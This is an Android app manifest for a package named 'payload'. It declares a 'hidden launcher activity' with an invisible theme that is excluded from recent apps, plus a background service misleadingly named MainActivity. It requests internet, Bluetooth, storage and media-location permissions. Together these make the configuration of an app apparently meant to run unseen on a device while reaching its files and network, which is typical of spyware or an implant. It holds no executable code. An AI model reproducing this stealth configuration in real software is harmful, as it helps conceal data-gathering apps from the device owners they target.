<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.payload">

    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.BLUETOOTH"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION"/>

    <application
        android:allowBackup="false"
        android:supportsRtl="false"
        android:theme="@android:style/Theme.Translucent.NoTitleBar">

        <!-- Hidden launcher activity -->
        <activity
            android:name=".DummyActivity"
            android:excludeFromRecents="true"
            android:exported="true"
            android:noHistory="true"
            android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <service
            android:name=".MainActivity"
            android:enabled="true"
            android:exported="false"/>
    </application>
</manifest>
